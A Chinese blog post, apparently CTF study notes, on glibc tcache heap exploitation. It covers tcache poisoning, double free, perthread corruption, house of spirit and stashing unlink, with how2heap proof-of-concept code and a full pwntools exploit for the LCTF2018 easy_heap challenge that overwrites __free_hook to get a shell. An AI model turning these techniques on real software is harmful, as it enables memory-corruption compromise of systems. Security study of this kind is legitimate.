Tcache Attack
tcache overview
tcache机制在libc2.26之后新增,可以说它是类似于fastbin的机制,LIFO,但比fastbin的优先级更高,由名字可以看出它相当于一个缓存的作用。先看关于它的两个结构体 tcache_entry
和 tcache_perthread_struct
(见glibc2.27源码):
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
可以看到tcache有一个next指针,指向下一个释放的tcache块,有定义TCACHE_MAX_BINS
可知,最多有64个tcache bin,每个bin最多有7个tcache块:
#if USE_TCACHE
/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */
# define TCACHE_MAX_BINS 64
# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
/* Only used to pre-fill the tunables. */
# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
/* When "x" is from chunksize(). */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */
# define usize2tidx(x) csize2tidx (request2size (x))
/* With rounding and alignment, the bins are...
idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
idx 1 bytes 25..40 or 13..20
idx 2 bytes 41..56 or 21..28
etc. */
/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
#endif
相关的两个重要函数实现从tcache取放chunk,tcache_get()
和 tcache_put()
:
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}
这两个函数会在init_free和__libc_malloc中调用,tcache_put分配大小不大于0x408且tchche bin未满时可调用,tcache_get也只检查了tc_idx是否合法,可看到就是链表删除和插入的操作,没有任何检查机制
关于tcache在申请和释放的时候,先检查对应大小的tcache有没有空闲,有就申请tcache,释放时也显示放到tcache,直到tcache满再依次按大小放入对应的bin中;若申请chunk时发现tcache相应位置有空闲,就将申请的chunk之后的chunk按照相应的便利方法加入到tcache。这里引用ctfwiki上的一段话:
内存申请: 在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。
(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin链上的其他内存块放入 tcache 中。
(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin链上的其他内存块放入 tcache 中。
(3)当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。
tcache 取出:在内存申请的开始部分,首先会判断申请大小块,在 tcache 是否存在,如果存在就直接从 tcache中摘取,否则再使用_int_malloc 分配。
在循环处理 unsorted bin 内存块时,如果达到放入 unsorted bin 块最大数量,会立即返回。默认是 0,即不存在上限。
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
在循环处理 unsorted bin 内存块后,如果之前曾放入过 tcache 块,则会取出一个并返回。
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif
pwn tcache
tcache poisoning(覆盖next指针)
通过覆盖next指针,实现malloc任意地址
条件:
- 有溢出,可覆盖next指针或UAF
- 需要知道目的地址(堆、栈、bss)
可参考how2heap的例子调试。
可以看出 tcache posioning 这种方法和 fastbin attack 类似,但因为没有 size 的限制有了更大的利用范围。
tcache dup(tcache的double free)
由于tcache在2.27-2.29上没有检测指针,可直接实现double free,比fastbin的double free好利用。
参考how2heap例子。
原理,将两个同样的chunk放入tcache,chunk1–>chunk1,先malloc chunk1,修改next指针为addr-anywhere使链表变为chunk1–>addr-anywhere,在经过两次malloc可申请到目标地址。然后可通过覆盖got表,修改函数指针达到利用目的。
条件:
- 需泄露地址(堆、栈、bss)、libc
tcache perthread corruption()
tcache_perthread_struct 结构体包含了tcache的所有相关指针,如果我们能控制该结构体,就可以越过malloc size限制,malloc到任何地址。引用ctfwiki上的图:
通过一些手段(如 tcache posioning),我们将其改为了
tcache_ +------------+<---------------------------+
\perthread |...... | |
\_struct +------------+ |
|counts[i] | |
+------------+ |
|...... | +----------+ |
+------------+ |header | |
|entries[i] |--------->+----------+ |
+------------+ |target |------+
|...... | +----------+
| | | |
+------------+ +----------+
这样,两次 malloc 后我们就返回了 tcache_perthread_struct 的地址,就可以控制整个 tcache 了。
条件:partial overwrite 部分覆盖
tcache house of spirit
参考how2heap源码调试。
原理:首先在栈(bss)上构造伪造的chunk,然后通过溢出修改pointer指针为伪造的栈地址,经过free后栈地址就会放入tcache,再次malloc对应大小就可控制该栈。
#include <stdio.h>
#include <stdlib.h>
int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
fprintf(stderr, "Ok. Let's start with the example!.\n\n");
fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);
fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region
fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);
fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size
fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];
fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}
smallbin unlink
在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。
tcache stashing unlink attack
这种攻击利用的是 tcache bin 有剩余 (数量小于 TCACHE_MAX_BINS ) 时,同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后会如果 tcache 仍有足够空闲位置,会将剩余的 small bin 链入 tcache ,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时,其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。
参见how2heap例子。
#include <stdio.h>
#include <stdlib.h>
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;
fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
// stack_var emulate the fake_chunk we want to alloc to
fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
stack_var[3] = (unsigned long)(&stack_var[2]);
fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");
//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}
//put 7 tcache
fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}
fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);
//convert into small bin
fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
malloc(0xa0);//>0x90
//now 5 tcache bins
fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
malloc(0x90);
malloc(0x90);
fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/
//trigger the attack
fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");
calloc(1,0x90);
fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
//malloc and return our fake chunk on stack
target = malloc(0x90);
fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
return 0;
}
效果:fakechunk->bk+0x10处会写入libc地址。
原理方法:
- 构造fake chunk(
stack_var[3] = (unsigned long)(&stack_var[2])
这里&stack_var[2]代表可写地址)bypass bck->fd = bin in glibc - 申请9个0x90chunk,然后free7个(3-8、1)填满tcache,free(0)、free(2)到unsortedbin
- 申请size>0x90 如0xa0,此时会匹配unstoredbin无匹配,会将unsortedbin 2->0 放入smallbin 2->0
- malloc两个tcache给之后free 的smallbin腾出位置
- 修改smallbin 2的bk为fake_chunk_addr
- calloc会从smallbin中匹配,匹配到chunk0,将其(fakechunk->chunk0)返回给用户,其余的链入tcache,根据smallbin由bk遍历,所以链入tcache顺序为fakechunk->chunk0
- 随后malloc将fakechunk申请出来
我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制),假设 tcache[sz] 中有 5 个空闲堆块,则有足够的位置容纳 chunk1 以及 fake_chunk。
在源码的检查中,只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim),后续堆块在放入过程中并没有检测。因为 tcache 的分配机制是 LIFO ,所以位于 fake_chunk->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户,同时,由于bin->bk(writeable_addr) = bck;bck->fd(writeable_addr->fd) = bin; 的 unlink 操作,会使得 writable_addr+0x10 处被写入一个 libc 地址。
tcache check
glibc2.27没有对tcache double free做检测,但是我最近针对glibc2.27的tcache出了一个pwn题,远程搭建环境ubuntu18.04 glibc2.27但是出现了double free检测,不知道为啥,以后再补!
wiki相关源码摘要:
index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
typedef struct tcache_entry
{
struct tcache_entry *next;
+ /* This field exists to detect double frees. */
+ struct tcache_perthread_struct *key;
} tcache_entry;
/* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
+
+ /* Mark this chunk as "in the tcache" so the test in _int_free will
+ detect a double free. */
+ e->key = tcache;
+
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
+ e->key = NULL;
return (void *) e;
}
@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
{
size_t tc_idx = csize2tidx (size);
+ /* Check to see if it's already in the tcache. */
+ tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+ /* This test succeeds on double free. However, we don't 100%
+ trust it (it also matches random payload data at a 1 in
+ 2^<size_t> chance), so verify it's not an unlikely coincidence
+ before aborting. */
+ if (__glibc_unlikely (e->key == tcache && tcache))
+ {
+ tcache_entry *tmp;
+ LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+ for (tmp = tcache->entries[tc_idx];
+ tmp;
+ tmp = tmp->next)
+ if (tmp == e)
+ malloc_printerr ("free(): double free detected in tcache 2");
+ /* If we get here, it was a coincidence. We've wasted a few
+ cycles, but don't abort. */
+ }
+
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
LCTF2018 PWN easy_heap
题目+源码+exp
保护全开,添加功能出现null-byte-overflow,可覆盖下个chunk的pre_inuse末位。
利用思路:制造tcache的double free实现任意地址写。通过unsortedbin合并修改
- 制造三个unsortedbin A、B、C,依次释放
- A、B合并,C的pre_size为0x200
- A、B、C合并,C的pre_size仍为0x200
- 将A分配、B、C分配出去,不要覆盖到0x200
- 将B释放到tcache头,再将A释放,使得fd、bk为libc指针
- 分配B溢出使得C的pre_inuse位为0,此时A(free)–B(allocated)–C(allocated)
- free(C)使得ABC合成大块,B在使用。
- 分配A,使得fd的libc地址落入B中,而B恰好在使用,可以输出,从而泄露libc
- 此时B已经在使用且有指向,此时再分配一个指针指向B,B就有两个指向,然后将其free掉,构造tcache的double free
- 修改free hook为onegadget得到shell。
过程中注意tcache的影响。
借用ctfwiki上的图:
1-3步骤:
+-----+
| | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块
+-----+
| A | <-- 3 个 unsorted bin 块
+-----+
| B |
+-----+
| C |
+-----+
| | <-- tcache 块,防止 top 合并
+-----+
| top |
| .. |
4-5步骤:
+-----+
| | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+
| A | <-- free
+-----+
| B | <-- free 且为 tcache 块
+-----+
| C |
+-----+
| | <-- tcache 块,防止 top 合并
+-----+
| top |
| .. |
6-7步骤:
+-----+
| | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+ --------+
| A | <-- free 大块 |
+-----+ |
| B | <-- 已分配 --------+--> 一个大 free 块
+-----+ |
| C | <-- free |
+-----+ --------+
| | <-- tcache 块,防止 top 合并 (free)
+-----+
| top |
| .. |
8-9步骤:
+-----+
| | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+
| A | <-- 已分配
+-----+
| B | <-- 已分配 --------+> 一个大 free 块
+-----+ |
| C | <-- free |
+-----+ --------+
| | <-- tcache 块,防止 top 合并 (free)
+-----+
| top |
| .. |
exp:
#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
import sys
import os
import os.path
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./easy_heap')
def cmd(idx):
p.recvuntil('>')
p.sendline(str(idx))
def new(size, content):
cmd(1)
p.recvuntil('>')
p.sendline(str(size))
p.recvuntil('> ')
if len(content) >= size:
p.send(content)
else:
p.sendline(content)
def delete(idx):
cmd(2)
p.recvuntil('index \n> ')
p.sendline(str(idx))
def show(idx):
cmd(3)
p.recvuntil('> ')
p.sendline(str(idx))
return p.recvline()[:-1]
def main():
# Your exploit script goes here
# step 1: get three unsortedbin chunks
# note that to avoid top consolidation, we need to arrange them like:
# tcache * 6 -> unsortd * 3 -> tcache
for i in range(7):
new(0x10, str(i) + ' - tcache')
for i in range(3):
new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks
# arrange:
for i in range(6):
delete(i)
delete(9)
for i in range(6, 9):
delete(i)
# step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)
for i in range(7):
new(0x10, str(i) + ' - tcache')
# rearrange to take second unsorted bin into tcache chunk, but leave first
# unsorted bin unchanged
new(0x10, '7 - first')
new(0x10, '8 - second')
new(0x10, '9 - third')
for i in range(6):
delete(i)
# move second into tcache
delete(8)
# delete first to provide valid fd & bk
delete(7)
new(0xf8, '0 - overflow')
# fill up tcache
delete(6)
# trigger
delete(9)
# step 3: leak, fill up
for i in range(7):
new(0x10, str(i) + ' - tcache')
new(0x10, '8 - fillup')
libc_leak = u64(show(0).strip().ljust(8, '\x00'))
p.info('libc leak {}'.format(hex(libc_leak)))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = libc_leak - 0x3ebca0
# step 4: constrecvuntilct UAF, write into __free_hook
new(0x10, '9 - next')
# these two provides sendlineots for tcache
delete(1)
delete(2)
delete(0)
delete(9)
new(0x10, p64(libc.symbols['__free_hook'])) # 0
new(0x10, '/bin/sh\x00into target') # 1
one_gadget = libc.address + 0x4f322
new(0x10, p64(one_gadget))
# system("/bin/sh\x00")
delete(1)
p.interactive()
if __name__ == '__main__':
main()
上一篇: Luogu P1226 取余运算||快速幂_快速幂
下一篇: 虚拟机安装与网络配置
推荐阅读
-
浅析node应用的timing-attack安全漏洞
-
Return to Libc Attack
-
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
-
LeetCode-1222. Queens That Can Attack the King
-
[CF1292C] Xenon's Attack on the Gangs
-
LeetCode 1222. Queens That Can Attack the King
-
【java-array】1222. Queens That Can Attack the King
-
渗透测试工具:The TrustedSec Attack Platform(TAP)
-
Java attack - Java 特性
-
[A]onepunch(tcache stash&&seccomp)